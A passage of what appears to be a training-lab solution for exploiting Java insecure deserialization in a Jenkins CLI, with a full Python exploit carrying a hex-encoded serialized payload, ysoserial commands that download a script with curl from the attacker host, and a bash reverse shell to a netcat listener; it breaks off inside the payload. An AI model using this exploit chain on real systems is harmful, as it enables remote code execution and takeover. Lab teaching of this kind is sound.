x00\\x00\\x00\\x78\\x70\\x73\\x72\\x00\\x1e\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x24\\x53\\x6f\\x75\\x72\\x63\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x01\\x4c\\x00\\x06\\x74\\x68\\x69\\x73\\x24\\x30\\x74\\x00\\x19\\x4c\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2f\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2f\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x3b\\x77\\x04\\x00\\x00\\x00\\x00\\x78\\x72\\x00\\x13\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x45\\x78\\x63\\x65\\x70\\x74\\x69\\x6f\\x6e\\xd0\\xfd\\x1f\\x3e\\x1a\\x3b\\x1c\\xc4\\x02\\x00\\x00\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x72\\x00\\x13\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x54\\x68\\x72\\x6f\\x77\\x61\\x62\\x6c\\x65\\xd5\\xc6\\x35\\x27\\x39\\x77\\xb8\\xcb\\x03\\x00\\x04\\x4c\\x00\\x05\\x63\\x61\\x75\\x73\\x65\\x74\\x00\\x15\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x54\\x68\\x72\\x6f\\x77\\x61\\x62\\x6c\\x65\\x3b\\x4c\\x00\\x0d\\x64\\x65\\x74\\x61\\x69\\x6c\\x4d\\x65\\x73\\x73\\x61\\x67\\x65\\x71\\x00\\x7e\\x00\\x02\\x5b\\x00\\x0a\\x73\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x74\\x00\\x1e\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x45\\x6c\\x65\\x6d\\x65\\x6e\\x74\\x3b\\x4c\\x00\\x14\\x73\\x75\\x70\\x70\\x72\\x65\\x73\\x73\\x65\\x64\\x45\\x78\\x63\\x65\\x70\\x74\\x69\\x6f\\x6e\\x73\\x74\\x00\\x10\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x4c\\x69\\x73\\x74\\x3b\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x70\\x71\\x00\\x7e\\x00\\x10\\x70\\x75\\x72\\x00\\x1e\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x45\\x6c\\x65\\x6d\\x65\\x6e\\x74\\x3b\\x02\\x46\\x2a\\x3c\\x3c\\xfd\\x22\\x39\\x02\\x00\\x00\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x70\\x00\\x00\\x00\\x0b\\x73\\x72\\x00\\x1b\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x45\\x6c\\x65\\x6d\\x65\\x6e\\x74\\x61\\x09\\xc5\\x9a\\x26\\x36\\xdd\\x85\\x02\\x00\\x04\\x49\\x00\\x0a\\x6c\\x69\\x6e\\x65\\x4e\\x75\\x6d\\x62\\x65\\x72\\x4c\\x00\\x0e\\x64\\x65\\x63\\x6c\\x61\\x72\\x69\\x6e\\x67\\x43\\x6c\\x61\\x73\\x73\\x71\\x00\\x7e\\x00\\x02\\x4c\\x00\\x08\\x66\\x69\\x6c\\x65\\x4e\\x61\\x6d\\x65\\x71\\x00\\x7e\\x00\\x02\\x4c\\x00\\x0a\\x6d\\x65\\x74\\x68\\x6f\\x64\\x4e\\x61\\x6d\\x65\\x71\\x00\\x7e\\x00\\x02\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x70\\x00\\x00\\x00\\x43\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x74\\x00\\x0c\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x2e\\x6a\\x61\\x76\\x61\\x74\\x00\\x06\\x3c\\x69\\x6e\\x69\\x74\\x3e\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x32\\x71\\x00\\x7e\\x00\\x15\\x71\\x00\\x7e\\x00\\x16\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x63\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x74\\x00\\x0c\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x2e\\x6a\\x61\\x76\\x61\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x02\\x39\\x74\\x00\\x32\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x24\\x52\\x50\\x43\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x74\\x00\\x1c\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x2e\\x6a\\x61\\x76\\x61\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\xf6\\x74\\x00\\x27\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x71\\x00\\x7e\\x00\\x1e\\x74\\x00\\x06\\x69\\x6e\\x76\\x6f\\x6b\\x65\\x73\\x71\\x00\\x7e\\x00\\x13\\xff\\xff\\xff\\xff\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x24\\x50\\x72\\x6f\\x78\\x79\\x31\\x70\\x74\\x00\\x0f\\x77\\x61\\x69\\x74\\x46\\x6f\\x72\\x50\\x72\\x6f\\x70\\x65\\x72\\x74\\x79\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x04\\xe7\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x68\\x61\\x6e\\x6e\\x65\\x6c\\x74\\x00\\x0c\\x43\\x68\\x61\\x6e\\x6e\\x65\\x6c\\x2e\\x6a\\x61\\x76\\x61\\x74\\x00\\x15\\x77\\x61\\x69\\x74\\x46\\x6f\\x72\\x52\\x65\\x6d\\x6f\\x74\\x65\\x50\\x72\\x6f\\x70\\x65\\x72\\x74\\x79\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x93\\x74\\x00\\x0e\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x63\\x6c\\x69\\x2e\\x43\\x4c\\x49\\x74\\x00\\x08\\x43\\x4c\\x49\\x2e\\x6a\\x61\\x76\\x61\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x48\\x74\\x00\\x1f\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x63\\x6c\\x69\\x2e\\x43\\x4c\\x49\\x43\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x69\\x6f\\x6e\\x46\\x61\\x63\\x74\\x6f\\x72\\x79\\x74\\x00\\x19\\x43\\x4c\\x49\\x43\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x69\\x6f\\x6e\\x46\\x61\\x63\\x74\\x6f\\x72\\x79\\x2e\\x6a\\x61\\x76\\x61\\x74\\x00\\x07\\x63\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x01\\xdf\\x71\\x00\\x7e\\x00\\x2a\\x71\\x00\\x7e\\x00\\x2b\\x74\\x00\\x05\\x5f\\x6d\\x61\\x69\\x6e\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x01\\x86\\x71\\x00\\x7e\\x00\\x2a\\x71\\x00\\x7e\\x00\\x2b\\x74\\x00\\x04\\x6d\\x61\\x69\\x6e\\x73\\x72\\x00\\x26\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x24\\x55\\x6e\\x6d\\x6f\\x64\\x69\\x66\\x69\\x61\\x62\\x6c\\x65\\x4c\\x69\\x73\\x74\\xfc\\x0f\\x25\\x31\\xb5\\xec\\x8e\\x10\\x02\\x00\\x01\\x4c\\x00\\x04\\x6c\\x69\\x73\\x74\\x71\\x00\\x7e\\x00\\x0f\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x72\\x00\\x2c\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x24\\x55\\x6e\\x6d\\x6f\\x64\\x69\\x66\\x69\\x61\\x62\\x6c\\x65\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x19\\x42\\x00\\x80\\xcb\\x5e\\xf7\\x1e\\x02\\x00\\x01\\x4c\\x00\\x01\\x63\\x74\\x00\\x16\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x3b\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x70\\x73\\x72\\x00\\x13\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x41\\x72\\x72\\x61\\x79\\x4c\\x69\\x73\\x74\\x78\\x81\\xd2\\x1d\\x99\\xc7\\x61\\x9d\\x03\\x00\\x01\\x49\\x00\\x04\\x73\\x69\\x7a\\x65\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x70\\x00\\x00\\x00\\x00\\x77\\x04\\x00\\x00\\x00\\x00\\x78\\x71\\x00\\x7e\\x00\\x39\\x78\\x71\\x00\\x7e\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x70\\x00\\x00\\x00\\x01\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x90\\xce\\x58\\x9f\\x10\\x73\\x29\\x6c\\x02\\x00\\x00\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x70\\x00\\x00\\x00\\x01\\x74\\x00\\x18\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x63\\x6c\\x69\\x2e\\x43\\x6c\\x69\\x45\\x6e\\x74\\x72\\x79\\x50\\x6f\\x69\\x6e\\x74\\x71\\x00\\x7e\\x00\\x24\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\xad\\xd2\\x56\\xe7\\xe9\\x1d\\x7b\\x47\\x02\\x00\\x00\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x70\\x00\\x00\\x00\\x01\\x74\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x74\\x00\\x1d\\x52\\x50\\x43\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x28\\x31\\x2c\\x77\\x61\\x69\\x74\\x46\\x6f\\x72\\x50\\x72\\x6f\\x70\\x65\\x72\\x74\\x79\\x29'\nprint 'sending payload...'\n'''outf = open('payload.tmp','w')\noutf.write(payload)\noutf.close()'''\nsock.send(payload)\n```\n\n**Step 5:** Create a reverse shell payload.\n\nCopy and paste the command into a file and save it as **shell.sh**.\n\n**Syntax:** bash -i >& /dev/tcp/&lt;lhost&gt;/&lt;lport&gt; 0>&1\n\n**Command:**\n```\nbash -i >& /dev/tcp/192.24.161.2/9999 0>&1\n```\n\n\n**Step 6:** Setup a Netcat listener that will be listening for connections on port 9999.\n\n**Command:**\n```\nnc -lvp 9999\n```\n![4](https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/4.png)\n\n**Step 7:** Host the shell.sh file using a Python SimpleHTTPServer. In the same directory where the file is present, execute the below.\n\n**Command:**\n```\npython -m SimpleHTTPServer 8888\n```\n![5](https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/5.png)\n\n**Step 8:** Generate a payload with a **ysoserial** file and make the target machine download the shell.sh file from attacker machine.\n\n**Command:**\n```\njava -jar ~/Desktop/tools/ysoserial/ysoserial-master-SNAPSHOT.jar CommonsCollections1 \"curl http://192.24.161.2:8888/shell.sh -o /tmp/shell.sh\" > /root/payload.out\n```\n![6](https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/6.png)\n\n**Step 9:** Execute the python exploit code.\n\n**Usage:** python exploit.py  &lt;host&gt; &lt;port&gt; &lt;/path/to/payload&gt;\n\n**Command:**\n```\npython exploit.py 192.24.161.3 8080 /root/payload.out\n```\n![7](https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/7.png)\n\nThis result from the python server shows that shell.sh file is downloaded by the target machine, and the payload is working as expected.\n\n![8](https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/8.png)\n\nWe have to run the python exploit two more times to execute the bash script in the target machine.\n\n**Step 10:** Generate a payload again for making the downloaded shell.sh file executable.\n\n**Command:**\n```\njava -jar ~/Desktop/tools/ysoserial/ysoserial-master-SNAPSHOT.jar CommonsCollections1 \"chmod +x /tmp/shell.sh\" > /root/payload.out\n```\n![9](https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/9.png)\n\n**Step 11:** Execute the python code again to send the payload for making shell.sh file executable.\n\n**Command:**\n```\npython exploit.py 192.24.161.3 8080 /root/payload.out\n```\n![10](https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/10.png)\n\n**Step 12:** Generate a payload for executing the downloaded shell.sh file again.\n\n**Command:**\n```\njava -jar ~/Desktop/tools/ysoserial/ysoserial-master-SNAPSHOT.jar CommonsCollections1 \"/bin/bash /tmp/shell.sh\" > /root/payload.out\n```\n![11](https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/11.png)\n\n**Step 13:** Execute the python code again to send the payload to the target machine for executing shell.sh file.\n\n**Command:**\n```\npython exploit.py 192.24.161.3 8080 /root/payload.out\n```\n![12](https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/12.png)\n\n**Step 14:** Open the terminal where the Netcat was listening. The shell should arrive on the Netcat listener.\n\nCheck the id by the following command.\n\n**Command:**\n```\nid\n```\n\n![13](https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/13.png)\n\nSuccessfully achieved remote code execution.",
    "solutions_html": "<h1>Solution</h1>\n<p><strong>Step 1:</strong> Start the lab. Wait until the lab is ready. Once the lab is ready, the kali Linux interface will be available on the browser.</p>\n<p><img alt=\"0\" src=\"https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/0.png\" /></p>\n<p><strong>Step 2:</strong> Scan the network with Nmap and gather the information about the target machine.</p>\n<p>Use the following command to get the information about open ports and services in the network.</p>\n<p><strong>Command:</strong>\n<pre class=\"codehilite\"><code>nmap demo.ine.local</code></pre>\n<img alt=\"1\" src=\"https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/1.png\" /></p>\n<p>Got the information about the IP address and the ports which are open in the target machine.</p>\n<p><strong>Step 3:</strong> Inspect the Jenkins application by navigating to the IP address at port 8080 in the web browser.</p>\n<p><strong>Target URL:</strong>\n<pre class=\"codehilite\"><code>http://192.24.161.3:8080/</code></pre></p>\n<p><img alt=\"2\" src=\"https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/2.png\" /></p>\n<p><strong>Step 4:</strong> Copy and paste the python exploit code and save it as exploit.py.</p>\n<p><strong>Source:</strong> <a href=\"https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/jenkins.py\">https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/jenkins.py</a></p>\n<p><strong>Code:</strong>\n<pre class=\"codehilite\"><code class=\"language-py\">#!/usr/bin/python\n#usage: ./jenkins.py host port /path/to/payload\nimport socket\nimport sys\nimport requests\nimport base64\nhost = sys.argv[1]\nport = sys.argv[2]\n#Query Jenkins over HTTP to find what port the CLI listener is on\nr = requests.get('http://'+host+':'+port)\ncli_port = int(r.headers['X-Jenkins-CLI-Port'])\n#Open a socket to the CLI port\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver_address = (host, cli_port)\nprint 'connecting to %s port %s' % server_address\nsock.connect(server_address)\n# Send headers\nheaders='\\x00\\x14\\x50\\x72\\x6f\\x74\\x6f\\x63\\x6f\\x6c\\x3a\\x43\\x4c\\x49\\x2d\\x63\\x6f\\x6e\\x6e\\x65\\x63\\x74'\nprint 'sending \"%s\"' % headers\nsock.send(headers)\ndata = sock.recv(1024)\nprint &gt;&gt;sys.stderr, 'received \"%s\"' % data\ndata = sock.recv(1024)\nprint &gt;&gt;sys.stderr, 'received \"%s\"' % data\npayloadObj = open(sys.argv[3],'rb').read()\npayload_b64 = base64.b64encode(payloadObj)\npayload='\\x3c\\x3d\\x3d\\x3d\\x5b\\x4a\\x45\\x4e\\x4b\\x49\\x4e\\x53\\x20\\x52\\x45\\x4d\\x4f\\x54\\x49\\x4e\\x47\\x20\\x43\\x41\\x50\\x41\\x43\\x49\\x54\\x59\\x5d\\x3d\\x3d\\x3d\\x3e'+payload_b64+'\\x00\\x00\\x00\\x00\\x11\\x2d\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1b\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x55\\x73\\x65\\x72\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x03\\x4c\\x00\\x10\\x63\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x50\\x72\\x6f\\x78\\x79\\x74\\x00\\x30\\x4c\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2f\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2f\\x52\\x65\\x6d\\x6f\\x74\\x65\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x24\\x49\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x3b\\x5b\\x00\\x07\\x72\\x65\\x71\\x75\\x65\\x73\\x74\\x74\\x00\\x02\\x5b\\x42\\x4c\\x00\\x08\\x74\\x6f\\x53\\x74\\x72\\x69\\x6e\\x67\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x78\\x72\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x03\\x49\\x00\\x02\\x69\\x64\\x49\\x00\\x08\\x6c\\x61\\x73\\x74\\x49\\x6f\\x49\\x64\\x4c\\x00\\x08\\x72\\x65\\x73\\x70\\x6f\\x6e\\x73\\x65\\x74\\x00\\x1a\\x4c\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2f\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2f\\x52\\x65\\x73\\x70\\x6f\\x6e\\x73\\x65\\x3b\\x78\\x72\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x01\\x4c\\x00\\x09\\x63\\x72\\x65\\x61\\x74\\x65\\x64\\x41\\x74\\x74\\x00\\x15\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x45\\x78\\x63\\x65\\x70\\x74\\x69\\x6f\\x6e\\x3b\\x78\\x70\\x73\\x72\\x00\\x1e\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x24\\x53\\x6f\\x75\\x72\\x63\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x01\\x4c\\x00\\x06\\x74\\x68\\x69\\x73\\x24\\x30\\x74\\x00\\x19\\x4c\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2f\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2f\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x3b\\x78\\x72\\x00\\x13\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x45\\x78\\x63\\x65\\x70\\x74\\x69\\x6f\\x6e\\xd0\\xfd\\x1f\\x3e\\x1a\\x3b\\x1c\\xc4\\x02\\x00\\x00\\x78\\x72\\x00\\x13\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x54\\x68\\x72\\x6f\\x77\\x61\\x62\\x6c\\x65\\xd5\\xc6\\x35\\x27\\x39\\x77\\xb8\\xcb\\x03\\x00\\x04\\x4c\\x00\\x05\\x63\\x61\\x75\\x73\\x65\\x74\\x00\\x15\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x54\\x68\\x72\\x6f\\x77\\x61\\x62\\x6c\\x65\\x3b\\x4c\\x00\\x0d\\x64\\x65\\x74\\x61\\x69\\x6c\\x4d\\x65\\x73\\x73\\x61\\x67\\x65\\x71\\x00\\x7e\\x00\\x03\\x5b\\x00\\x0a\\x73\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x74\\x00\\x1e\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x45\\x6c\\x65\\x6d\\x65\\x6e\\x74\\x3b\\x4c\\x00\\x14\\x73\\x75\\x70\\x70\\x72\\x65\\x73\\x73\\x65\\x64\\x45\\x78\\x63\\x65\\x70\\x74\\x69\\x6f\\x6e\\x73\\x74\\x00\\x10\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x4c\\x69\\x73\\x74\\x3b\\x78\\x70\\x71\\x00\\x7e\\x00\\x10\\x70\\x75\\x72\\x00\\x1e\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x45\\x6c\\x65\\x6d\\x65\\x6e\\x74\\x3b\\x02\\x46\\x2a\\x3c\\x3c\\xfd\\x22\\x39\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x0c\\x73\\x72\\x00\\x1b\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x45\\x6c\\x65\\x6d\\x65\\x6e\\x74\\x61\\x09\\xc5\\x9a\\x26\\x36\\xdd\\x85\\x02\\x00\\x04\\x49\\x00\\x0a\\x6c\\x69\\x6e\\x65\\x4e\\x75\\x6d\\x62\\x65\\x72\\x4c\\x00\\x0e\\x64\\x65\\x63\\x6c\\x61\\x72\\x69\\x6e\\x67\\x43\\x6c\\x61\\x73\\x73\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x08\\x66\\x69\\x6c\\x65\\x4e\\x61\\x6d\\x65\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x0a\\x6d\\x65\\x74\\x68\\x6f\\x64\\x4e\\x61\\x6d\\x65\\x71\\x00\\x7e\\x00\\x03\\x78\\x70\\x00\\x00\\x00\\x43\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x74\\x00\\x0c\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x2e\\x6a\\x61\\x76\\x61\\x74\\x00\\x06\\x3c\\x69\\x6e\\x69\\x74\\x3e\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x32\\x71\\x00\\x7e\\x00\\x15\\x71\\x00\\x7e\\x00\\x16\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x63\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x74\\x00\\x0c\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x2e\\x6a\\x61\\x76\\x61\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x3c\\x74\\x00\\x1b\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x55\\x73\\x65\\x72\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x74\\x00\\x10\\x55\\x73\\x65\\x72\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x2e\\x6a\\x61\\x76\\x61\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x03\\x08\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x68\\x61\\x6e\\x6e\\x65\\x6c\\x74\\x00\\x0c\\x43\\x68\\x61\\x6e\\x6e\\x65\\x6c\\x2e\\x6a\\x61\\x76\\x61\\x74\\x00\\x04\\x63\\x61\\x6c\\x6c\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\xfa\\x74\\x00\\x27\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x74\\x00\\x1c\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x2e\\x6a\\x61\\x76\\x61\\x74\\x00\\x06\\x69\\x6e\\x76\\x6f\\x6b\\x65\\x73\\x71\\x00\\x7e\\x00\\x13\\xff\\xff\\xff\\xff\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x24\\x50\\x72\\x6f\\x78\\x79\\x31\\x70\\x74\\x00\\x0f\\x77\\x61\\x69\\x74\\x46\\x6f\\x72\\x50\\x72\\x6f\\x70\\x65\\x72\\x74\\x79\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x04\\xe7\\x71\\x00\\x7e\\x00\\x20\\x71\\x00\\x7e\\x00\\x21\\x74\\x00\\x15\\x77\\x61\\x69\\x74\\x46\\x6f\\x72\\x52\\x65\\x6d\\x6f\\x74\\x65\\x50\\x72\\x6f\\x70\\x65\\x72\\x74\\x79\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x93\\x74\\x00\\x0e\\x68\\x75\\x64\\x73